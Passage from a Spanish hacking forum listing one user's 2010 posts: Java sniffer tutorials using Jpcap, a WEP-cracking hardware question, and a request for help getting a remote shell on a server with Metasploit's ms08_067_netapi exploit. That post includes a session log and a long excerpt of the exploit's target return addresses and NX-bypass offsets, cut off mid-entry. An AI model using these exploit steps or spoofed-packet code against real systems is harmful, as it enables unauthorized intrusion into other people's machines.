elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Temas
Páginas: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16
91  Foros Generales / Sugerencias y dudas sobre el Foro / ESte usuario esta autorizado a hacer publicidad? en: 7 Marzo 2010, 20:29 pm
Drinky94
Sin rodeos, me ha enviado un mensaje con publicidad de su web...
No se si esta autorizado a hacer publi por el foro, pero weno...
Hola buenas, Registrate en la nueva comunidad:

www.mundo-*******.net

Te esperamos!
Acaba de responder poniendo como repsuesta a mi mensaje de anti-spam

Sinceramente me ha molestado... existen otros metodos para dar a conocer tu pagina web, pero spamear...

Saludos
92  Programación / ASM / MMM por donde empiezo? [Pregunta del millón] en: 7 Marzo 2010, 19:31 pm
Haber antes de nada aclarar que de ASM se lo que he podido aprender debuggeando apps:
Que EIP apunta a la siguiente direciond e memoria que va ejecutar el procesador
Algunos registros...
que con ADD añadimos datos a un regsitro y se suman....

Y que no dispongo d emedios para comprar ningun libro
Algun PDF, paper, o guia, aunque sea un hi world bien explicado

Me conformo con poder hacer algo por mi cuenta.

Saludos
93  Seguridad Informática / Materiales y equipos / Una tarjeta de red 100% compatible con la suite aircrack? en: 21 Febrero 2010, 19:12 pm
Hola a todos, jeje despues de un tiempo alejado del tema de la seguridad wireless por no conseguir nada de nada (me temo que mi tarje no inyecta bien...) vengo a preguntaros por algun modelo de tarjeta wireless con la que peuda crackear contraseñas wep sin problema, supongo que debe haber muchas, pero cuala es la mejor para todo esto?

He estado viendo la erize, pero no se exactamente si vale para lo que busco:

http://www.ciudadwireless.com/erize_erzw54-usb04rs300_adaptador_wireless_300mw_antena_5dbi-p-2537.html

Espero que em puedan ayudar.
Si es posible que los drivers de esta esten parhceados en los SO convencionales de este tipo (Wifislax, wifiway, Backtrack...)

Saludos
94  Programación / Java / Duda referente a la ventanita estilo JS en: 30 Enero 2010, 19:43 pm
Hola a todos, ya he conseguido que al pasar el mouse por un cierto elemento de mi gui aparezca la ventanita informativa, pero ocurre un problema, que yo quiero que al movemer por el elemento donde sale la ventanita se mueva etsa tambien, y es que cuando la invoco al entrar en el elemento el elemento pierdo control ya que la ventanita esta en primer palno y el elemento deja de escuchar al mouse.

Como puedo hacer para que el eleemto siga escuchando aunque haya algo delante?

Saludos
95  Programación / Java / Elementos Drag 'n Drop en: 30 Enero 2010, 17:36 pm
Hola a tod@s de nuevo vengo para consultares sobre la existencia de una libreria en java.
Quiero hacer una red sinaptica y quiero hacerlo con elementos tipo drag 'n drop, osea que tenga una especie de escritorio donde pueda añadir nuevos elementos, moverlos y elmininarlos libremente sobre una zona de trabajo.

Si quereis ver algun ejemplo existe una poderosisima aplicacion en java llamada maltego que usa lo que busco:


Alguna idea sobre lo que busco?


Saludos
96  Programación / Java / NovaXplosion Framework - Framework de pentest [Unete al desarrollo!] en: 23 Enero 2010, 20:13 pm
Hola a todos, vengo a proponeros una genialidad o una locura (eso lo dejo a vuestro gusto), un framework de pentest.
La seguridad informatica es algo que incumbe a todos, y como todo lo que es importante en esta vida, hay que estar preparados, por esto es bueno que si hay que dedicarse a hacer un buen soft de este tipo, mejor es que sea multiplataforma y con la potencia de java.

La idea no es una maquina de hacking, si no de auditoria, exportación de informes, trabajo en equipo, escaneo persistente...
He aqui las caracteristicas basicas:

  • Capacidad para usar exploits descargados de Milw0rm con el exploitDB
  • AutoXplosion: Usa todas los exploits que haya para cierto puerto-aplicación y encontrar la autentica vulnerabilidad
  • Importación desde nessus y nmap con visualización grafica de arbol de las vulnerabilidades
  • Exportación de resultados a pdf y html, para entregar el informe completo
  • Busqueda de posibles soluciones usando la information gathering, y una pequeña base de datos sobre las vulnerabilidades mas conocidas y como repararlos-parchearlos
  • Capacidad para conectar varios framework para trabajar en grupo, enviar datos, compartir información...
  • Escáner de puertos integrado propio

Ya tengo hechas varias cosas, pero he pensado que hay gente a la que le interesaria colaborar con esto, asi que me abro a propuestas-reclutamiento de desarrolladores.

La idea definitiva, es crear una aplicación que sirva para protejer un sistema, y ayudar a los auditores informaticos a tener una herramienta que sirva para dar informes y maneras de protejer un sistema.

Todo esto no es mas que un voceto de lo que en un futuro, pretendo que sea.

Saludos
97  Programación / Java / Ventanita estilo JS emergente en: 18 Enero 2010, 22:01 pm
Hola a todos, me gustaria saber como poner esas ventanitas emergente tan modernas que siguen al mouse, que ponen en paginas web "sofisticadas" (si sofisticadas...) que pasas el ratón encima de un link y te aparece una ventanita informativa cerca del mouse y se va cuando sales del enlace.
He pensado hacerlo con el motor de scripting rhino pero no veo la manera puesto que es javascript a java, y no se como hacerlo de manera equitativa y constructiva (definitivamente soy un chaquetero...) me refiero a poder ponerle una imagen diseñarlo y tal que no se un simple contextMenu descriptivo de java, si no con imagenes y eso.

Alguna idea?

Parto de 0.

Saludos
98  Programación / Java / [Tutorial]Creación de un sniffer (Pasos avanzados) #2 en: 9 Enero 2010, 19:06 pm
PROGRAMACIÓN DE RED EN JAVA #2
Lectura y envio de paquetes, filtros, manipulación de paquetes....


Hola a tod@s y bienvenid@s una vez mas a esta entrega, sobre el desarrollo de nuestro propio sniffer.

Como prometí en mi anterior host, en esta ocasión vamos a tratar los siguientes temas:

  • Envio y lectura de paquetes completo (en este casi solo he puesto code).
  • Escritura de los paquetes leidos en un fichero, asi como lectura de los paquetes:
              Ejemplo práctico de leer paquetes, guardarlos en un archivo y re-enviarlos.
  • Filtros de lectura de paquetes, para nuestro programa y tambien para wireshark y otros.

Bueno, para refrescar un poco la memoria...
En la parte anterior a esta, comentabamos y aprendimos a saber que interfaces de red teniamos conectadas,estructurar y visualizar su información, como la direción mac, la ip, nombre de la interfaz de red...

Esta vez vamos a ir un poco mas lejos, vamos a recibir y escribir paquetes.

Bien empezamos, por algo que ya enseñé en el post anterior, leer paquetes de red, aqui el codigo:
Código
  1. JpcapCaptor captor=JpcapCaptor.openDevice(device[index], 65535, false, 20);
  2.  
  3. for(int i=0;i<10;i++){
  4.  //Capturar un paquete simple y muestrearlo
  5.  System.out.println(captor.getPacket());
  6. }
  7.  
  8. captor.close();
Esta vez si que voy a explicar mas a fondo la clase JpcapCaptor, primero de todo decir, que es la clase que se encarga tramitar entre los paquetes de red y las interfaces, etsamos con esta clase, configurando la interface, el puerto, el modo, y el timeout de lectura:
Código
  1. Jpcap.openDevice(indice interfaz, puerto, modo promiscuo, timeout de lectura);
Ahora que esta explicada, vamos a a profundizar el codigo completo:

  • Primero de todo tenemos la declaración/encapsulación del objeto PcapCaptor, con el que ponemos a la escucha de paquetes a una interface. Para ello hemos indicado al programa con argumentos que, lo haga con la interfaz que esta en el indice index(int), sobre el puerto 65535, modo promiscuo desactivado y con un timeout de lectura de 20 ms.
  • En segundo lugar hemos creado un bucle lógico-condicional con el que leemos durante 10 loops con un timeout de 20 ms, por tanto leemos un maximo de 10 paquetes, si alguno se retrasa mas de 20 ms no lo leerá.
  • Y por ultimo cerramos la interfaz y la quitamos de la escucha de paquetes.

Bien ahora sabemos leer paquetes, ahora vamos a ser mas especificos, con la el tipo de captura, vamos a filtrar los paquetes, para ello vamos a usar el metodo setFilter() de PcapCaptor, veamos como:

Código
  1. JpcapCaptor captor=JpcapCaptor.openDevice(device[index], 65535, false, 20);
  2. //Exclusivizamos la captura de paquetes para IPv4/TCP
  3. captor.setFilter("ip and tcp", true);
  4.  

Bien veamos, hemos dicho al captor de paquetes que solo coja los de tcp y ip (IPv4).
Esto es sencillo, pero saber todo esto de poco nos vale si tan solo capturamos paquetes, vamos a capturarlos y a guardarlos en un archivo de texto plano, para ello haremos uso de JpcapWriter:

Código
  1. JpcapCaptor captor=JpcapCaptor.openDevice(device[index], 65535, false, 20);
  2. //OPertura de archivo
  3. JpcapWriter writer=JpcapWriter.openDumpFile(captor,"yourfilename");
  4.  

JpcapWriter nos proporciona un metodo para escribir archivos con el contenido del capturador, este metodo es openDumpFile, en el primer argumento le indicamos que obejto JpacpCaptor recive para escribir y en el segundo, indicamos con una string que archivo vamos a escribir.
No creo que haya complicaciones, quizas alguna FileNotFoundException, pero no mas.

Ahora toca escribirlos con un bucle lógico, combinando lo anterior con la escritura:

Código
  1. JpcapCaptor captor=JpcapCaptor.openDevice(device[index], 65535, false, 20);
  2. //Opertura de archivo
  3. JpcapWriter writer=JpcapWriter.openDumpFile(captor,"yourfilename");
  4.  
  5. for(int i=0;i<10;i++){
  6.  //Captura un paquete sencillo
  7.  Packet packet=captor.getPacket();
  8.  //Guardar en el archivo abierto
  9.  writer.writePacket(packet);
  10. }
  11. writer.close();
  12.  
Con esto abriremos, leeremos y escribiremos paquetes en un archivo en concreto.
Bien ahora que hemos leido paquetes, los hemos dumpeado a un fichero, vamos a leerlos y a maquinar con ellos:

Código
  1. //Abre el archivo donde teniamos los apquetes leidos
  2. JpcapCaptor captor=JpcapCaptor.openFile("yourfilename");
  3.  
  4. while(true){
  5.  //Lee el archivo abierto
  6.  Packet packet=captor.getPacket();
  7.  //Si ocurre algo malo, algun erro u algo , rompemos el bucle
  8.  if(packet==null || packet==Packet.EOF) break;
  9.  //Printeamos el paquete leido
  10.  System.out.println(packet);
  11. }
  12.  
  13. captor.close();
  14.  

El ejemplo es claro, pero quiero que ahora penseis, si recivimos paquetes, por ejemplo estando en un mitm, los leemos, y modificamos de manera automatizada con algun bucle, y desciframos información de estos, estamos ante una herramienta muy potente, y creada por nosotros, totalmente personalizable.

Bien ya dominamos la lectura y modificación de paquetes (si hombre, aunque no lo haya explicado sabeis que se puede modificar, por bytes, por String, por chars...), ahora toca el envio de paquetes, jeje....

Código
  1. //Abre la interface para envio
  2. JpcapSender sender=JpcapSender.openDevice(devices[index]);
  3.  
  4. //Crea un paquete TCP personalizado con puertos y mierdas de esas xD como veis hay muchas opciones
  5. TCPPacket p=new TCPPacket(12,34,56,78,false,false,false,false,true,true,true,true,10,10);
  6.  
  7. //Parametros de IPv4
  8. p.setIPv4Parameter(0,false,false,false,0,false,false,false,0,1010101,100,IPPacket.IPPROTO_TCP,
  9.  InetAddress.getByName("www.elhacker.net"),InetAddress.getByName("www.google.com"));
  10.  
  11. //El campo data del paquete
  12. p.data=("data").getBytes();
  13.  
  14. //Crea un paquete tipo Ethernet para el envio
  15. EthernetPacket ether=new EthernetPacket();
  16. //Pone la frame como tipo IP
  17. ether.frametype=EthernetPacket.ETHERTYPE_IP;
  18. //Pone las mac de envio y recpcion
  19. ether.src_mac=new byte[]{(byte)0,(byte)1,(byte)2,(byte)3,(byte)4,(byte)5};
  20. ether.dst_mac=new byte[]{(byte)0,(byte)6,(byte)7,(byte)8,(byte)9,(byte)10};
  21.  
  22. //Envia el datalink al paquete para enviarlo
  23. p.datalink=ether;
  24.  
  25. //Envia el paquete
  26. sender.sendPacket(p);
  27.  
  28. sender.close();
  29.  

Bien, para esto tendriais que ler algo sobre paquetes de red, wifi netowrks y esas cosas, en la secion de seguridad wireless hay mucho relacionado, pero comentar algo, para que veais que esto tiene un uso.
Bien si empezamos a leer paquetes, y reenviamos esos paquetes, podemos provocar reaciones extrañas, si hacemos esto de manera masvia cosas malevolas(que no debeis hacer sin permiso del que se compromete, porque ni yo ni elhacker.net se hacen responsables). Investigad, probad y no murais en el intento.

En el proximo tutorial hablaremos sobre el diseño final de un sniffer, y probablemente ya tenga el source para postearlo.

Un saludo a tod@s y espeor que os guste.

99  Programación / Java / [Tutorial #1]Primer paso para crear un sniffer en java en: 8 Enero 2010, 23:07 pm
PROGRAMACIÓN DE RED EN JAVA
Paquetes TCP/UDP, conexiones de red, interfaces...


Hola a todos, recientemente me he puesto a estudiar las posibilidades de java como sniffer, asi que voy a poner lo que he aprendido, en unos cuantos tutoriales, y acabremos haciendo un sniffer.

Primero de todo decir que para todo esto estoy usando la libreria:
JPCAP -------> http://netresearch.ics.uci.edu/kfujii/jpcap/doc/download.html

Bien cabe comentar tambien que para ejecutar los ejemplos de los tutos, hace falta hacerlo bajo ROOT, asi que si no funciona, una psoible causa es esa.

Bien en el primer tutorial vamos a crear una mini-aplicacion tipo iwconfig-ifconfig que nos enumere todas las interfaces conectadas al equipo, bien empecemos:

Primero de todo hay que crear la lista de dispositivos, encapsulando la clase NetworkInterface a modo de array o matriz (para luego leer los interfaces usando un indice sencillo):

Código
  1. NetworkInterface[] devices = JpcapCaptor.getDeviceList();

Le asignamos a la matriz todos los dispositivos mediante el metodo getDEviceList() de la clase JpcapCaptor.

Una vez hecho estoy, vamos a recorrer el array con un bucle logico usando como limitador el length (longitud) del array:

Código
  1. for (int i = 0; i < devices.length; i++)

Muy sencillo, y ahora una vez estamos recorriendo vamos a mostrar informacion de los dispositivos, usando los metodos NetworkInterface:

Código
  1. //Metodo name para sacar el nombre la interface
  2. System.out.println("Nombre de interface: "+devices[i].name + "\n======================================\n" + devices[i].description);
  3.  
  4. //Metodo datalink_name para sacar el nombre de este
  5. System.out.println("Nombre del datalink: "+devices[i].datalink_name + "\n==========================================\n" + devices[i].datalink_description+".\n");
  6.  
  7. //Esta claro no? xD
  8. System.out.print("Direción MAC: ");
  9.  for (byte b : devices[i].mac_address)
  10.    System.out.print(Integer.toHexString(b&0xff) + ":");
  11.  

Bien con etso ultimo hemos visto de manera completa, como sacar información de todos los dispositivos de red que haya conectados al equipo, vamos a profundizarlo un poquito mas:

Código
  1. for (NetworkInterfaceAddress a : devices[i].addresses)
  2.    System.out.println(" address:"+a.address + " " + a.subnet + " "+ a.broadcast);
  3.  
Con eso, como es evidente, sacaremos la direcion de red, ip, mascara de red y demás.

Mmm esto esta muy bien, pero... yo quiero jugar con la red diran otros, pues os diré que esto lo reservo para el siguiente tuto, pero os pondre un pequeño adelanto para que vallais jugando y probando cosas si, quereis claro...

Vamos a leer 10 paquetes de red en un puerto determinado y una interface concreta:

Código
  1. JpcapCaptor captor=JpcapCaptor.openDevice(device[indice], 65535, false, 1);
  2.  
  3. for(int i=0;i<10;i++){
  4.  //Capturamos un paquete y lo muestreamos
  5.  System.out.println(captor.getPacket());
  6. }
  7.  
  8. captor.close();
  9.  
Como veis, el bucle se para en el decimo loop, y como leemos un paquete por loop, solo leemos 10 paquetes,y lo hacemos sobre la interface (hay que marcara que indice de interface con el int indice que correpsonde al indice del array).
En el puerto 65535, aqui escojemos que puerto queremos sniffar, leer, o escribir en un futuro no muy lejano paquetes.
El tercer parametro no es relevante ahora, pero ma starde lo explicaré.
El cuarto parametro es el que nos indica cuantos paquetes por cada llamada a getPacket() leemos, si ponemos envezde uno, 20, leeremos 20 paquetes por cada llamada a getPacket(), y por tanto 20 paquetes por loop, lo que viene a ser 10*20 = 200 paquetes.

Bueno, ahora os dejo un ejemplo para escritura de paquetes:

Código
  1. JpcapSender sender=JpcapSender.openDevice(devices[index]);
  2.  
  3.  
  4. TCPPacket p=new TCPPacket(12,34,56,78,false,false,false,false,true,true,true,true,10,10);
  5.  
  6. p.setIPv4Parameter(0,false,false,false,0,false,false,false,0,1010101,100,IPPacket.IPPROTO_TCP,
  7.  InetAddress.getByName("www.microsoft.com"),InetAddress.getByName("www.google.com"));
  8.  
  9.  
  10. p.data=("data").getBytes();
  11.  
  12.  
  13. EthernetPacket ether=new EthernetPacket();
  14.  
  15. ether.frametype=EthernetPacket.ETHERTYPE_IP;
  16.  
  17. ether.src_mac=new byte[]{(byte)0,(byte)1,(byte)2,(byte)3,(byte)4,(byte)5};
  18. ether.dst_mac=new byte[]{(byte)0,(byte)6,(byte)7,(byte)8,(byte)9,(byte)10};
  19. p.datalink=ether;
  20.  
  21. sender.sendPacket(p);
  22.  
  23. sender.close();
  24.  

El codigo anterior, lo que hace es enviar un paquete en la interfaz de red (paquete de tipo TCP/IPv4/Ethernet), usando unos puertos determinados, entre dos hosts.

En el proximo tutorial aprenderemos a:
  • Envio y lectura de paquetes completo (en este casi solo he puesto code).
  • Escritura de los paquetes leidos en un fichero, asi como lectura de los paquetes:
              Ejemplo práctico de leer paquetes, guardarlos en un archivo y re-enviarlos.
  • Filtros de lectura de paquetes, para nuestro programa y tambien para wireshark y otros.
Y mucho mas!
Cuando acabe todo pondre el source de mi sniffer de red, en java bajo ide netbeans para que todos se beneficien y aprendan.

Un saludo y gracias por aguantarme xD (que leer esto no es moco de pavo)





100  Seguridad Informática / Hacking / Problema para conseguir remote shell en: 8 Enero 2010, 17:07 pm
Hola a todos, estoy auditando un servidor, que por la cantidad de puertos abiertos parece ser muy vulnerable, pero como ya comente hace tiempo, no puedo atacarle mediante el ms08_067_netapi, en puerto 445 abierto (sip, esta abierto), por que no detecta bien el paquete de idiomas del guind0$, estos son los puertos abiertos (que no se os caiga la baba):

Código:
7/tcp    open  echo
9/tcp    open  discard
13/tcp   open  daytime
17/tcp   open  qotd
19/tcp   open  chargen
21/tcp   open  ftp
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1027/tcp open  IIS
1028/tcp open  unknown
1029/tcp open  ms-lsa
1030/tcp open  iad1
1031/tcp open  iad2
1455/tcp open  esl-lm
3306/tcp open  mysql
3389/tcp open  ms-term-serv
8009/tcp open  ajp13
8080/tcp open  http-proxy
8085/tcp open  unknown
8402/tcp open  unknown
8443/tcp open  https-alt


Bien ahora viene la parte técnica en la cual fallo:

Código:
debci@0x81:/pentest/exploits/framework3$ sudo ./msfconsole
[sudo] password for debci:

                                  _            
                                 | |      o    
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |  
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|                  
                           \|                  


       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 491 exploits - 225 auxiliary
+ -- --=[ 251 payloads - 23 encoders - 8 nops
       =[ svn r8082 updated today (2010.01.07)

msf > use exploit/windows/smb/ms08_067_netapi                                  3
RHOST => xxxxxxxxxxtapi) > set RHOST xx.xx.xx.xx
rpreter/bind_tcpmsf exploit(ms08_067_netapi) > set PAYLOAD windows/mete
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >


Entonces, me puse a investigar (siguiendo un link que el compañero kamsky me proporcionó):
http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html

Bien, pero en esa guia, se explica como hacerlo trasteando con un proceso .exe de windows, y yo trabajo bajo linux, e aqui el problema, de todos modos me puse a invetsigar sobre el exploit, en mi caso se ejecuta bajo el interprete del framework metasploit, y para mi sorpresa, si que tiene el idioma castellano, el cual es el probable del host, observen:

Código:
#
# UNIVERSAL TARGETS
#

#
# Antoine's universal for Windows 2000
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
#
[ 'Windows 2000 Universal',
{
'Ret'       => 0x001f1cb0,
'Scratch'   => 0x00020408,
}
], # JMP EDI SVCHOST.EXE

#
# Standard return-to-ESI without NX bypass
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
#
[ 'Windows XP SP0/SP1 Universal',
{
'Ret'       => 0x01001361,
'Scratch'   => 0x00020408,
}
], # JMP ESI SVCHOST.EXE

#
# ENGLISH TARGETS
#

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 English (NX)',
{
'Ret'       => 0x6f88f727,
'DisableNX' => 0x6f8916e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL


# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 English (NX)',
{
'Ret'       => 0x6f88f807,
'DisableNX' => 0x6f8917c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP0 Universal',
{
'Ret'       => 0x0100129e,
'Scratch'   => 0x00020408,
}
], # JMP ESI SVCHOST.EXE


# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP1 English (NO NX)',
{
'Ret'       => 0x71bf21a2,
'Scratch'   => 0x00020408,
}
], # JMP ESI WS2HELP.DLL

# Brett Moore's crafty NX bypass for 2003 SP1
[ 'Windows 2003 SP1 English (NX)',
{
'RetDec'    => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
'RetPop'    => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
'Scratch'   => 0x00020408,
}
],

# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP2 English (NO NX)',
{
'Ret'       => 0x71bf3969,
'Scratch'   => 0x00020408,
}
], # JMP ESI WS2HELP.DLL

# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 English (NX)',
{
'RetDec'    => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop'    => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
'Scratch'   => 0x00020408,
}
],


#
# NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
#

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Arabic (NX)',
{
'Ret'       => 0x6fd8f727,
'DisableNX' => 0x6fd916e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Chinese - Traditional / Taiwan (NX)',
{
'Ret'       => 0x5860f727,
'DisableNX' => 0x586116e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Chinese - Simplified (NX)',
{
'Ret'       => 0x58fbf727,
'DisableNX' => 0x58fc16e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Chinese - Traditional (NX)',
{
'Ret'       => 0x5860f727,
'DisableNX' => 0x586116e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Czech (NX)',
{
'Ret'       => 0x6fe1f727,
'DisableNX' => 0x6fe216e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Danish (NX)',
{
'Ret'       => 0x5978f727,
'DisableNX' => 0x597916e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 German (NX)',
{
'Ret'       => 0x6fd9f727,
'DisableNX' => 0x6fda16e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Greek (NX)',
{
'Ret'       => 0x592af727,
'DisableNX' => 0x592b16e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL


# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Spanish (NX)',
{
'Ret'       => 0x6fdbf727,
'DisableNX' => 0x6fdc16e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Finnish (NX)',
{
'Ret'       => 0x597df727,
'DisableNX' => 0x597e16e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 French (NX)',
{
'Ret'       => 0x595bf727,
'DisableNX' => 0x595c16e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Hebrew (NX)',
{
'Ret'       => 0x5940f727,
'DisableNX' => 0x594116e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Hungarian (NX)',
{
'Ret'       => 0x5970f727,
'DisableNX' => 0x597116e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Italian (NX)',
{
'Ret'       => 0x596bf727,
'DisableNX' => 0x596c16e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Japanese (NX)',
{
'Ret'       => 0x567fd3be,
'DisableNX' => 0x568016e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Korean (NX)',
{
'Ret'       => 0x6fd6f727,
'DisableNX' => 0x6fd716e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Dutch (NX)',
{
'Ret'       => 0x596cf727,
'DisableNX' => 0x596d16e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Norwegian (NX)',
{
'Ret'       => 0x597cf727,
'DisableNX' => 0x597d16e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Polish (NX)',
{
'Ret'       => 0x5941f727,
'DisableNX' => 0x594216e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Portuguese - Brazilian (NX)',
{
'Ret'       => 0x596ff727,
'DisableNX' => 0x597016e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Portuguese (NX)',
{
'Ret'       => 0x596bf727,
'DisableNX' => 0x596c16e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Russian (NX)',
{
'Ret'       => 0x6fe1f727,
'DisableNX' => 0x6fe216e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Swedish (NX)',
{
'Ret'       => 0x597af727,
'DisableNX' => 0x597b16e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Turkish (NX)',
{
'Ret'       => 0x5a78f727,
'DisableNX' => 0x5a7916e2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Arabic (NX)',
{
'Ret'       => 0x6fd8f807,
'DisableNX' => 0x6fd917c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
{
'Ret'       => 0x5860f807,
'DisableNX' => 0x586117c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Chinese - Simplified (NX)',
{
'Ret'       => 0x58fbf807,
'DisableNX' => 0x58fc17c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Chinese - Traditional (NX)',
{
'Ret'       => 0x5860f807,
'DisableNX' => 0x586117c2,
'Scratch'   => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Czech (NX)',
{
'Ret'       => 0x6fe1f807,
'DisableNX' => 0x6fe217c2,
